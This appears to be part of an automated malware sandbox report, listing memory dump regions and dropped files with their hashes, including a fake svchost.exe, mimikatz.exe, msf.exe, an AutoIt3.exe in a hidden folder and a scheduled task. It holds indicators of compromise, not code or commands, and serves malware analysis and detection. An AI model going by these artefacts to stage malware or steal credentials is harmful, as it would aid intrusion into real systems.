memory/6260-10176-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp

memory/8112-10188-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 74b69084450d644a129195282bfb0f9a
SHA1 ffb7f2d1a9b989a5f0efeb9dbdb7d09e57dcdfdd
SHA256 19018d9b0bf2ca78774d3ffdfed4513f6cc6e17a8f4ba80a2cb7f37270ac97ba
SHA512 9005de844e55e3cfabd30f03bbebfb46e3a554c3ef0f19f41fc660ffeff66f5bf62161ed8f85aa5c4559efde0e865e8dd17df8a63219abfa8fe1d511910d3242

memory/8088-10364-0x0000000000DD0000-0x00000000010F4000-memory.dmp

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

MD5 e46aaf1691c780f9bbdb68feb90024b8
SHA1 05c3be0a3f8b047cadaec75b5bd59a3fa5ba9586
SHA256 b0f233e452a86af1c91466ed94ec94e37f02e6a939f16a9ed969c73dc3baa83e
SHA512 0cdc338b7b97e38acec66e37df578e31c28ad3cb484111ab0e2297cee64fe98b67d42538e8caddf279f9582efe816a4ec3c76bac638a219756fde7b60a94fdb9

memory/4592-10686-0x0000000000E00000-0x0000000001124000-memory.dmp

memory/6960-10799-0x00000000009B0000-0x0000000000CD4000-memory.dmp

memory/7296-10866-0x0000000000AB0000-0x0000000001082000-memory.dmp

memory/7296-10876-0x0000000005D40000-0x0000000005EC6000-memory.dmp

memory/7296-10877-0x0000000005920000-0x0000000005942000-memory.dmp

C:\Users\Admin\Desktop\Files\svchost.exe

MD5 da4b81bd7225f06fa1ff1a6c0f50c69f
SHA1 e630b7442a8f9cf9945216dcab8e750ebd01e307
SHA256 01c295a6690c48ff3196ff3ef0fef7383bdba9beaa6dadf8426e689263be5e20
SHA512 57017466deb54d0a7a582a5352cbc90600b08cc4b0bd7c0ebf017d30f008507ef9d5257920bc76ffb0e271b9dc358eed7dadefbb2d305d4f6da53bf51a65d3f0

memory/4104-10991-0x0000000000E90000-0x0000000000EA6000-memory.dmp

memory/7192-11030-0x0000000000D80000-0x00000000010A4000-memory.dmp

memory/4664-11237-0x0000000000A40000-0x0000000000D64000-memory.dmp

memory/2140-11531-0x0000000000A20000-0x0000000000D44000-memory.dmp

memory/6692-11657-0x0000000000CF0000-0x0000000001014000-memory.dmp

memory/6836-11778-0x0000000000930000-0x0000000000C54000-memory.dmp

memory/6028-12008-0x0000000000D20000-0x0000000001044000-memory.dmp

C:\ProgramData\adbabbcfdbc.cfg

MD5 7712f3490a250619730314c9e76971ef
SHA1 1e15ddfcf03033cfc45d7e7d603cfd4d3720a086
SHA256 972bcf2d3f9c22628cc3fb6b478085c3616a2053eea636462a2ea84407164f24
SHA512 7c498573dd89ba140ea4a824f5df16e6d57b6755d3fcad5413579d2739b375669c5778874e81b93aba695ff3fc6a387b975fbac964b51c4ebf9b2abb8279aa5f

memory/7892-12121-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/2740-12187-0x0000000000680000-0x00000000009A4000-memory.dmp

memory/7892-12188-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6652-12291-0x00000000008E0000-0x0000000000C04000-memory.dmp

memory/7084-12305-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/7084-12372-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6352-12456-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6352-12572-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6880-12595-0x0000000000A70000-0x0000000000A82000-memory.dmp

memory/5952-12835-0x0000000000610000-0x0000000000934000-memory.dmp

C:\ProgramData\wvtynvwe\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\Desktop\Files\856.exe

MD5 68edafe0a1705d5c7dd1cb14fa1ca8ce
SHA1 7e9d854c90acd7452645506874c4e6f10bfdda31
SHA256 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d
SHA512 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

memory/3724-13081-0x0000000000450000-0x0000000000686000-memory.dmp

C:\Users\Admin\Desktop\Files\ciscotest.exe

MD5 0076324b407d0783137badc7600327a1
SHA1 29e6cb1f18a43b8e293539d50272898a8befa341
SHA256 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583
SHA512 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4

memory/3724-13090-0x0000000005150000-0x000000000522C000-memory.dmp

memory/3724-14227-0x0000000005310000-0x0000000005368000-memory.dmp

memory/3724-14565-0x00000000050C0000-0x0000000005114000-memory.dmp

C:\Windows\System32\Tasks\Test Task17

MD5 b929f752eefcbc69fa7b6c4cb52b3a00
SHA1 dfaa828faa819a31c73e309dd1819f3446fab996
SHA256 4023bb6ef24afd8412072ff49790efffba497a7f6bf1b8fd2f81e53c42064e8a
SHA512 d3b0983f53142828a0c4c68e6bdbf5c7a5f13810b5cfee2c466b2e2da5c6953d009803712cd346b292f7d0419c9a70872e904fc1b9d4eb933ff950314825bd2f

C:\Users\Admin\Desktop\Files\msf.exe

MD5 8597aa1db8457c9b8e2e636c55a56978
SHA1 d6ee74a13ee56eb7556e88b5b646e1c3581bf163
SHA256 e1579bd0d471cdfbcadbb1b27454da080a6a5e13021033208b7592ccea607320
SHA512 943299ec65c1ebf0e74725648419ca76bdba72cbc39accb63305f57bba45c88227e9df80aebea9dfe47014c534e7067e7e844584356c6a39097d816c27c6a22f

memory/6812-15987-0x0000000000340000-0x0000000000664000-memory.dmp

memory/7356-16074-0x0000000000230000-0x0000000000554000-memory.dmp

memory/2724-16198-0x0000000000C60000-0x0000000000F84000-memory.dmp

memory/4784-16202-0x0000000000560000-0x0000000000884000-memory.dmp

C:\Users\Admin\Desktop\Files\mimikatz.exe

MD5 6dca8f740c1d76413c77796c7344d861
SHA1 e747301f18bdedd2b06794a0d372ce11db8370ae
SHA256 2280e717c054c708e8930acfda84805c5ac05eced6c06a0146f836ce2f5a00ec
SHA512 f7cb58a9001821cbeba7720d724715d7d3c58e2518ef36eb234095023d498bbf49a25214ad15f8297afbfdb8f26001b8b18495c64daec6a3deb4490f347dc892

C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe

MD5 2b8f487213f3da1f42779e22d7b02d1a
SHA1 77c96429d6facbd1900290c9cbfed378103b8e01
SHA256 a4da37e92ca54c8851ad144fba875b61e2018f69bbe43b11926d8f8d831b56f0
SHA512 2db88a30fdfc1e859edb7229b2073449b5d57640e484e21d78047fd674fc194c2c790995621b4d0ed7927ec06e8325c7333a1893227e50d38b2559fc267cc6bf

memory/6288-16528-0x0000000000BD0000-0x0000000000CB6000-memory.dmp

C:\Users\Admin\Desktop\Files\winX32.exe

MD5 eee37f6f66eafa13d9555dfc9ccb3805
SHA1 c9b2dd6b4bd464cb767b5ff1260dc07e223cd0b8
SHA256 ca569ad2e113c57c5ddeb1770ae4d63f579df3504306097ff8a16b1cb37dcaa9
SHA512 9bf9709f3a1dcdf97d7c88e133702f0c46756125b65adc7b6b3d61ed7b624aa5212729f7fe95c35ef1d457175c3613b4deaf625268c9651e8bdd57201c379218

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 4bd39015c30927b5aade8b354ae4967d
SHA1 e74e6c5d906f71736d9d5410daaa087f28ee78bd
SHA256 4b85f8a124c2a808e6f7e327354aaab86403dd3270d8e0f0e182ca3587d0a8d9
SHA512 ede8db463da500f4272fcdc2901a51b9196818d5f4de38294d43522a4636210f4cd7f1776f72e912f98b96f30d1491c9e4d817a1f6f760f3e780bd196affcbe4

C:\Users\Admin\AppData\Roaming\app

MD5 bbcd2be775370c1e106e66d077a93f3b
SHA1 a44b6a98f30e3275fc304bc3b29e0eab8ae47f20
SHA256 a7aa76f137ba550c381cfb8e5195a01963ae49db167e1cd1e0a8b902ed81eda1
SHA512 bb6e0d1f24253a9525fd538debf8ca68eb7078cb8539140c184331a854ecdea192fbcc314c4154a0a474c9aec41a79efeb8150922454c3c9e71eeb5297ae2f72

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.exe.log

MD5 b4e91d2e5f40d5e2586a86cf3bb4df24
SHA1 31920b3a41aa4400d4a0230a7622848789b38672
SHA256 5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210
SHA512 968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 592ab7edba153a868690f737ca51b7e2
SHA1 aa5381cd2f1b7ae954b369212b748c5d348e3002
SHA256 7632ef4855cf6d0ec1b69def6853378ca049484b4361e10139bbb727a68fe03a
SHA512 c26c4fa0f310c8932bdaff7c83d5081214ebf5109a71181767cccc9adbc0233d18ab9627e01f3b3f83f7ffdde71af0cda6e6c2345845f07650f6108a5d98682e